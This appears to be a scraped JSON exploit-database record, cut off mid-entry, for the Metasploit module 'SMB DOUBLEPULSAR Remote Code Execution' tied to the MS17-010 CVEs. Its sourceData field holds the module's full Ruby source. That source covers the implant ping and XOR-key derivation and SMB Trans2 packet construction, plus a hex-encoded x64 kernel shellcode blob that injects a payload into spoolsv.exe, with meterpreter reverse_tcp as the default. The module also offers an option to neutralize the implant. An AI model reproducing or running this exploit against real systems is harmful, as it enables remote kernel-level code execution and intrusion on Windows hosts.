"zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T06:15:19", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", 
"1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:15:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T06:15:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-28] #"}, "lastseen": "2021-09-28T06:15:19", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "0a2b076156d9565de54657daee1a21d5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant by sending it the implant's kill opcode. Either target first runs the module's check (a DOUBLEPULSAR ping whose success response yields the implant's XOR key and architecture) and refuses to run while the DefangedMode advanced option, enabled by default, is set, because acting on the implant may contaminate forensic evidence; payload execution is only supported against the x64 implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-28T22:16:48", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-29702", 
"1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 